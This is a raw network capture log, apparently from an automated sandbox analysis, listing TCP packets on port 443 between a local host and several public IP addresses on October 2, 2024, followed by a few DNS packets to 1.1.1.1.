Oct 2, 2024 01:13:27.803647995 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:27.804017067 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:27.804023981 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:27.804526091 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:27.851396084 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:27.981981993 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:27.982181072 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:27.982264042 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:27.982616901 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:27.982625008 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:27.985076904 CEST	49672	443	192.168.2.6	173.222.162.64
Oct 2, 2024 01:13:28.313632011 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.320750952 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.320760012 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.320782900 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.320795059 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.320804119 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.320825100 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.320863008 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.320898056 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.320898056 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.320916891 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.361234903 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.402699947 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.402714014 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.402769089 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.402777910 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.402781963 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.402812958 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.402833939 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.402833939 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.402848959 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.408605099 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.408622026 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.408669949 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.408679008 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.408732891 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.489048004 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.489067078 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.489130020 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.489141941 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.489178896 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.490751982 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.490766048 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.490852118 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.490858078 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.490892887 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.492687941 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.492702007 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.492777109 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.492784023 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.492820978 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.537956953 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.537981987 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.538027048 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.538037062 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.538083076 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.578459978 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.578488111 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.578540087 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.578552961 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.578600883 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.578871965 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.578892946 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.578924894 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.578931093 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.578958988 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.578973055 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.579907894 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.579926014 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.579989910 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.579997063 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.580037117 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.580878973 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.580902100 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.580952883 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.580969095 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.581001043 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.583440065 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.583461046 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.583506107 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.583523989 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.583563089 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.583573103 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.588371992 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.588392973 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.588432074 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.588443995 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.588470936 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.588485003 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.664397955 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.664422989 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.664467096 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.664514065 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.664518118 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.664527893 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.664540052 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.664554119 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.664566040 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.664613008 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.664627075 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.665021896 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.665040970 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.665074110 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.665082932 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.665107965 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.665318966 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.665333033 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.665374994 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.665383101 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.665400982 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.669508934 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.669532061 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.669583082 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.669606924 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.669621944 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.671365023 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.671381950 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.671438932 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.671458006 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.671479940 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.671762943 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.671788931 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.671814919 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.671823025 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.671847105 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.711195946 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.751760006 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.751790047 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.751832962 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.751928091 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.751954079 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.751982927 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.752012968 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.752027035 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.752063036 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.752073050 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.752085924 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.752485037 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.752527952 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.752540112 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.752546072 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.752559900 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:28.752580881 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.752604008 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.891447067 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.952465057 CEST	49718	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:28.952516079 CEST	443	49718	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:29.723529100 CEST	443	49705	173.222.162.64	192.168.2.6
Oct 2, 2024 01:13:29.723611116 CEST	49705	443	192.168.2.6	173.222.162.64
Oct 2, 2024 01:13:29.863854885 CEST	49721	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:13:29.863920927 CEST	443	49721	142.250.185.132	192.168.2.6
Oct 2, 2024 01:13:29.864089966 CEST	49721	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:13:29.864329100 CEST	49721	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:13:29.864345074 CEST	443	49721	142.250.185.132	192.168.2.6
Oct 2, 2024 01:13:30.184561968 CEST	49722	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:30.184607029 CEST	443	49722	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:30.184700012 CEST	49722	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:30.188345909 CEST	49722	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:30.188358068 CEST	443	49722	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:30.546183109 CEST	443	49721	142.250.185.132	192.168.2.6
Oct 2, 2024 01:13:30.546788931 CEST	49721	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:13:30.546814919 CEST	443	49721	142.250.185.132	192.168.2.6
Oct 2, 2024 01:13:30.547986031 CEST	443	49721	142.250.185.132	192.168.2.6
Oct 2, 2024 01:13:30.548060894 CEST	49721	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:13:30.558000088 CEST	49721	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:13:30.558100939 CEST	443	49721	142.250.185.132	192.168.2.6
Oct 2, 2024 01:13:30.610920906 CEST	49721	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:13:30.610939026 CEST	443	49721	142.250.185.132	192.168.2.6
Oct 2, 2024 01:13:30.657778025 CEST	49721	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:13:30.824151993 CEST	443	49722	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:30.824213982 CEST	49722	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:30.832176924 CEST	49722	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:30.832200050 CEST	443	49722	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:30.832541943 CEST	443	49722	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:30.876529932 CEST	49722	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:31.385854959 CEST	49722	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:31.431416988 CEST	443	49722	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:31.570496082 CEST	443	49722	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:31.570566893 CEST	443	49722	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:31.570631981 CEST	49722	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:31.570700884 CEST	49722	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:31.570719957 CEST	443	49722	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:31.570733070 CEST	49722	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:31.570739031 CEST	443	49722	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:31.599796057 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:31.599822998 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:31.600081921 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:31.600383997 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:31.600398064 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:32.309956074 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:32.310028076 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:32.313952923 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:32.313958883 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:32.314191103 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:32.317209005 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:32.363399029 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:32.585319042 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:32.585388899 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:32.585437059 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:32.586801052 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 01:13:32.586807013 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 01:13:35.060627937 CEST	49724	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:35.060684919 CEST	443	49724	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:35.060904980 CEST	49724	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:35.061499119 CEST	49724	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:35.061521053 CEST	443	49724	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:35.867090940 CEST	443	49724	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:35.867161989 CEST	49724	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:35.869884014 CEST	49724	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:35.869894028 CEST	443	49724	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:35.870136023 CEST	443	49724	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:35.871808052 CEST	49724	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:35.871875048 CEST	49724	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:35.871880054 CEST	443	49724	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:35.871989012 CEST	49724	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:35.919399977 CEST	443	49724	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:36.209522009 CEST	443	49724	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:36.209621906 CEST	443	49724	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:36.209719896 CEST	49724	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:36.209891081 CEST	49724	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:36.209908962 CEST	443	49724	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:40.480238914 CEST	443	49721	142.250.185.132	192.168.2.6
Oct 2, 2024 01:13:40.480385065 CEST	443	49721	142.250.185.132	192.168.2.6
Oct 2, 2024 01:13:40.480434895 CEST	49721	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:13:41.302761078 CEST	49705	443	192.168.2.6	173.222.162.64
Oct 2, 2024 01:13:41.303066015 CEST	49705	443	192.168.2.6	173.222.162.64
Oct 2, 2024 01:13:41.303630114 CEST	49729	443	192.168.2.6	173.222.162.64
Oct 2, 2024 01:13:41.303678036 CEST	443	49729	173.222.162.64	192.168.2.6
Oct 2, 2024 01:13:41.303797960 CEST	49729	443	192.168.2.6	173.222.162.64
Oct 2, 2024 01:13:41.304749012 CEST	49729	443	192.168.2.6	173.222.162.64
Oct 2, 2024 01:13:41.304760933 CEST	443	49729	173.222.162.64	192.168.2.6
Oct 2, 2024 01:13:41.307554007 CEST	443	49705	173.222.162.64	192.168.2.6
Oct 2, 2024 01:13:41.307801008 CEST	443	49705	173.222.162.64	192.168.2.6
Oct 2, 2024 01:13:41.409713984 CEST	49721	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:13:41.409748077 CEST	443	49721	142.250.185.132	192.168.2.6
Oct 2, 2024 01:13:41.915061951 CEST	443	49729	173.222.162.64	192.168.2.6
Oct 2, 2024 01:13:41.915159941 CEST	49729	443	192.168.2.6	173.222.162.64
Oct 2, 2024 01:13:47.932519913 CEST	49730	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:47.932579994 CEST	443	49730	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:47.932707071 CEST	49730	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:47.933464050 CEST	49730	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:47.933480978 CEST	443	49730	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:48.585896969 CEST	443	49717	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:48.586107969 CEST	443	49717	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:48.586213112 CEST	49717	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:49.409991026 CEST	49717	443	192.168.2.6	185.172.129.102
Oct 2, 2024 01:13:49.410021067 CEST	443	49717	185.172.129.102	192.168.2.6
Oct 2, 2024 01:13:49.451232910 CEST	443	49730	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:49.451355934 CEST	49730	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:49.473114014 CEST	49730	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:49.473134041 CEST	443	49730	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:49.473392963 CEST	443	49730	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:49.477648020 CEST	49730	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:49.477993011 CEST	49730	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:49.477998972 CEST	443	49730	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:49.478178978 CEST	49730	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:49.523396969 CEST	443	49730	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:49.653888941 CEST	443	49730	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:49.654191017 CEST	443	49730	40.115.3.253	192.168.2.6
Oct 2, 2024 01:13:49.654244900 CEST	49730	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:49.654544115 CEST	49730	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:13:49.654567957 CEST	443	49730	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:01.072977066 CEST	443	49729	173.222.162.64	192.168.2.6
Oct 2, 2024 01:14:01.073051929 CEST	49729	443	192.168.2.6	173.222.162.64
Oct 2, 2024 01:14:09.539429903 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:09.539470911 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:09.539527893 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:09.540096045 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:09.540108919 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:10.321887970 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:10.322129011 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:10.330691099 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:10.330724001 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:10.331545115 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:10.334424973 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:10.334630966 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:10.334650993 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:10.336687088 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:10.383409977 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:10.504414082 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:10.504622936 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:10.504715919 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:10.505150080 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:10.505186081 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:29.859738111 CEST	49734	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:14:29.859778881 CEST	443	49734	142.250.185.132	192.168.2.6
Oct 2, 2024 01:14:29.859869957 CEST	49734	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:14:29.860301018 CEST	49734	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:14:29.860312939 CEST	443	49734	142.250.185.132	192.168.2.6
Oct 2, 2024 01:14:30.500416994 CEST	443	49734	142.250.185.132	192.168.2.6
Oct 2, 2024 01:14:30.500879049 CEST	49734	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:14:30.500943899 CEST	443	49734	142.250.185.132	192.168.2.6
Oct 2, 2024 01:14:30.501460075 CEST	443	49734	142.250.185.132	192.168.2.6
Oct 2, 2024 01:14:30.501949072 CEST	49734	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:14:30.502042055 CEST	443	49734	142.250.185.132	192.168.2.6
Oct 2, 2024 01:14:30.546258926 CEST	49734	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:14:39.384325981 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:39.384360075 CEST	443	49735	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:39.384422064 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:39.384998083 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:39.385014057 CEST	443	49735	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:40.177968025 CEST	443	49735	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:40.178052902 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:40.179843903 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:40.179852962 CEST	443	49735	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:40.180740118 CEST	443	49735	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:40.182557106 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:40.182625055 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:40.182631016 CEST	443	49735	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:40.182768106 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:40.223406076 CEST	443	49735	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:40.353564024 CEST	443	49735	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:40.353885889 CEST	443	49735	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:40.353950977 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:40.354165077 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:40.354185104 CEST	443	49735	40.115.3.253	192.168.2.6
Oct 2, 2024 01:14:40.354207993 CEST	49735	443	192.168.2.6	40.115.3.253
Oct 2, 2024 01:14:40.650129080 CEST	443	49734	142.250.185.132	192.168.2.6
Oct 2, 2024 01:14:40.650212049 CEST	443	49734	142.250.185.132	192.168.2.6
Oct 2, 2024 01:14:40.650343895 CEST	49734	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:14:41.408718109 CEST	49734	443	192.168.2.6	142.250.185.132
Oct 2, 2024 01:14:41.408761024 CEST	443	49734	142.250.185.132	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 01:13:25.250453949 CEST	53	62239	1.1.1.1	192.168.2.6
Oct 2, 2024 01:13:25.251630068 CEST	53	60254	1.1.1.1	192.168.2.6
Oct 2, 2024 01:13:26.420779943 CEST	53	58128	1.1.1.1	192.168.2.6
Oct 2, 2024 01:13:27.002365112 CEST	59379	53	192.168.2.6	1.1.1.1
Oct 2, 2024 01:13:27.002549887 CEST	57321	53	192.168.2.6	1.1.1.1
Oct 2, 2024 01:13:27.009022951 CEST	53	57321	1.1.1.1	192.168.2.6
Oct 2, 2024 01:13:27.010662079 CEST	53	59379	1.1.1.1	192.168.2.6
Oct 2, 2024 01:13:29.810864925 CEST	57222	53	192.168.2.6	1.1.1.1
Oct 2, 2024 01:13:29.811330080 CEST	62172	53	192.168.2.6	1.1.1.1
